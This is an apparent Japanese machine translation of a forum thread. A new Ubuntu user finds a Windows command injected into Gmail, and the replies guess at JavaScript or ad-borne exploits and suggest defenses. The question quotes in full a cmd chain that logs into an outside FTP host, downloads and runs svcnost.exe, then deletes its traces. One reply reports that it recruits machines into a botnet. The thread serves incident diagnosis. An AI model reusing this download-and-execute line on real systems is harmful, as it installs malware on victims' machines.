Linuxコンピューターがハッキングされたかどうかを識別する方法

自宅のPCは通常はオンになっていますが、モニターはオフになっています。今晩、仕事から帰ってきて、ハッキングの試みのように見えるものを見つけました：私のブラウザでは、Gmailは開いていました（それは私でした）が、TOフィールドで次のような作成モードでした：

md / c echo open cCTeamFtp.yi.org 21 >> ik＆echo user ccteam10 765824 >> ik＆echo binary >> ik＆echo get svcnost.exe >> ik＆echo bye >> ik＆ftp -n -v -s：ik＆del ik ＆svcnost.exe＆exit echoあなたが所有しました

これはWindowsのコマンドラインコードのように見えmd、Gmailが作成モードであるという事実と組み合わされたコードの開始は、誰かがcmdコマンドを実行しようとしたことを明らかにしています。私はこのPCで実際にWindowsを実行していないのは幸運だったと思いますが、他にも実行できるものがあります。このようなことが私に起こったのはこれが初めてです。私はLinuxの第一人者ではありません。また、当時Firefox以外のプログラムを実行していませんでした。

私はこれを書いていないことを絶対に確信しており、他の誰も私のコンピュータに物理的にいませんでした。また、最近、Googleのパスワード（および他のすべてのパスワード）を次のようなものに変更したvMA8ogd7bvため、誰かがGoogleアカウントをハッキングしたとは思わない。

今何があったの？何年もマルウェアを実行しているおばあちゃんの古いWindowsマシンではなく、最近の新しいUbuntuのインストールでは、誰かが私のコンピューターにキーストロークを入力する方法を教えてください。

更新：
いくつかのポイントと質問に対処しましょう。

• 私はオーストリアの田舎にいます。私のWLANルーターは、WPA2 / PSKと辞書にない中程度の強力なパスワードを実行します。総当たりで、ここから50メートル以内でなければなりません。ハッキングされた可能性は低いです。
• 私はUSB有線キーボードを使用しているので、誰もがハッキングする範囲内にいる可能性は非常に低いです。
• 当時はコンピューターを使用していませんでした。仕事中に家で遊んでいただけです。これは、モニターに取り付けられたネットトップPCなので、めったに電源をオフにしません。
• マシンはわずか2か月で、Ubuntuのみを実行します。私は奇妙なソフトウェアを使用したり、奇妙なサイトにアクセスしたりしていません。主にStack Exchange、Gmail、および新聞です。ノーゲーム。Ubuntuは最新の状態を保つように設定されています。
• 実行中のVNCサービスを認識していません。確かにインストールも有効化もしていません。他のサーバーも起動していません。デフォルトでUbuntuで実行されているものがあるかどうかわかりませんか？
• GmailのアカウントアクティビティのすべてのIPアドレスを知っています。Googleは入り口ではなかったと確信しています。
• Log File Viewerを見つけましたが、何を探すべきかわかりません。助けて？

私が本当に知りたいのは、そして本当に私を危険にさらしているのは、インターネット上の誰もが私のマシンでキーストロークをどのように生成できるのかということです。それについてすべてのtinfoil-hatでなくてもどうすればそれを防ぐことができますか？私はLinuxオタクではありません。私は20年以上もWindowsを台無しにしていて、飽き飽きしている父親です。そして、18年以上にわたってオンラインになっている間、私は個人的にハックの試みを見たことがないので、これは私にとって新しいことです。

心配することは何もありません。ダウンロードによってドライブを実行しようとしたのは、おそらくJavaScript攻撃でした。この問題が心配な場合は、NoScriptおよびAdBlock Plus Firefoxアドオンを使用してください。

信頼できるサイトにアクセスしても、悪意のあるサードパーティの広告主からJavaScriptコードが実行されるため、安全ではありません。

私はそれをつかみ、VMで実行しました。mircをインストールし、これがステータスログです... http://pastebin.com/Mn85akMk

これは、mIRCをダウンロードしてボットネットに参加させてスパムボットに変えようとする自動化された攻撃です...私のVMに参加させ、いくつかの異なるリモートアドレスへの接続を確立させましたautoemail-119.west320.com。

Windows 7で実行するには、UACプロンプトを受け入れ、ファイアウォールを介したアクセスを許可する必要がありました。

他のフォーラムにもこの正確なコマンドのレポートがたくさんあるようです。誰かが、トレントファイルがダウンロードの終了時に実行しようとしたとさえ言います...それがどのように可能かはわかりません。

私はこれを自分で使用したことはありませんが、現在のネットワーク接続を表示できるので、通常とは異なるものに接続されているかどうかを確認できます。http：//netactview.sourceforge.net/download.html

私は@ jb48394に同意しますが、これは最近のその他のあらゆるものと同様に、おそらくJavaScriptの悪用だと思います。

バックグラウンドでトロイの木馬を慎重にダウンロードするだけでなく、cmdウィンドウを開き（@torbengbのコメントを参照）、悪意のあるコマンドを実行しようとしたという事実は、キーストロークを入力できるFirefoxの脆弱性を悪用していることを示唆していますが、コードを実行しません。

これは、この悪用理由も、説明された明確 Windowsのためだけに書かれ、また、Linux上で動作します：FirefoxはすべてOS'esでJavaScriptと同じように実行します （少なくとも、それは:)しようとします）。バッファオーバーフローまたはWindows向けの同様のエクスプロイトが原因である場合、プログラムをクラッシュさせるだけでした。

JavaScriptコードの出所については、おそらく悪意のあるGoogle広告（広告は1日中Gmailで循環します）。それはないだろう ことが 最初の時間。

別のLinuxマシンで同様の攻撃を見つけました。Windows向けの何らかのFTPコマンドのようです。

これは質問全体に答えるわけではありませんが、ログファイルで失敗したログオン試行を探してください。

ログに約5回以上失敗した場合、誰かがクラックしようとしましたroot。rootコンピューターから離れているときにログオンに成功した場合は、すぐにパスワードを変更してください!! 今こそ正しい！できれば英数字で、約10文字の長さを使用してください。

受け取ったメッセージ（echoコマンド）を見ると、これは実際には未熟なスクリプトkiddieのように聞こえます。彼が何をしているかを知っているのが本物のハッカーだったとしても、おそらくあなたはそれについてまだ知らないでしょう。

whois レポートwest320.comはMicrosoftが所有しています。

UPnPとVino（システム->設定->リモートデスクトップ）と弱いUbuntuパスワードの組み合わせ

非標準のリポジトリを使用しましたか？

DEF CONでは、Wi-Fiアクセスポイントに到達できる距離について毎年Wi-Fiコンテストを開催しています-最後に聞いたのは250マイルでした。

本当に怖がりたい場合は、Zeusボットネットのコマンドアンドコントロールセンターのスクリーンショットをご覧ください。安全なマシンはありませんが、Linux上のFirefoxは他のマシンよりも安全です。さらに良いのは、SELinuxを実行している場合です。